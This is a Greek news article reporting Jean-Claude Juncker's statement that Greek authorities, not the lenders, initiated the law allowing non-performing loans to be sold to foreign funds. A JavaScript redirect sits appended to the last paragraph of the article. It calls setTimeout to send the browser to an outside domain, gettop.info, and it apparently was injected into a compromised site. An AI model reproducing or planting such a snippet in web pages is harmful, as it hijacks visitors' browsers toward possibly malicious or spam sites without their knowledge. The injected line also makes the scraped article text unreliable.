«Βόμβα» Γιούνκερ για κόκκινα δάνεια: Απόφαση της Αθήνας η πώληση σε ξένα funds

0
10

 

Η Αθήνα ευθύνεται για την την πώληση των κόκκινων δανείων σε ξένα funds, σημείωσε ο πρόεδρος της Κομισιόν Ζαν Κλοντ Γιούνκερ.

Απαντώντας στην εκπρόσωπο Ελλήνων δανειοληπτών ο πρόεδρος της ΕΕ υπογράμμισε ότι οι ελληνικές Αρχές είχαν την πρωτοβουλία και ο νόμος για τα κόκκινα δάνεια, δεν επιβλήθηκε από τους δανειστές.

Επίσης, απαντώντας σε ερώτημα σχετικά με το αν οι ευρωπαϊκοί θεσμοί έχουν επιβάλει στις ελληνικές Αρχές ως προαπαιτούμενο, τη μη νομοθέτηση του δικαιώματος του οφειλέτη και του εγγυητή να συμμετάσχουν στη διαδικασία που συνδέεται με την αγορά και πώληση του δανείου τους και του δικαιώματος να παρουσιάσουν προσφορά και από μέρους των ίδιων, ο κ. Γιούνκερ τόνισε ότι δεν ισχύει καμία τέτοια περίπτωση.

«Οι ελληνικές Αρχές είχαν την πρωτοβουλία της σύνταξης, τόσο της αρχικής όσο και της αναθεωρημένης έκδοσης του νόμου 4354/2015 και στο έργο τους αυτό δεν αντιμετώπισαν κανένα εκ προοιμίου περιορισμό όπως αυτόν που αναφέρετε στο ερώτημα σας και πράγματι ούτε συζητήθηκε κάτι τέτοιο σε κανένα στάδιο της νομοθετικής διαδικασίας» επεσήμανε ο κ. Γιούνκερ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here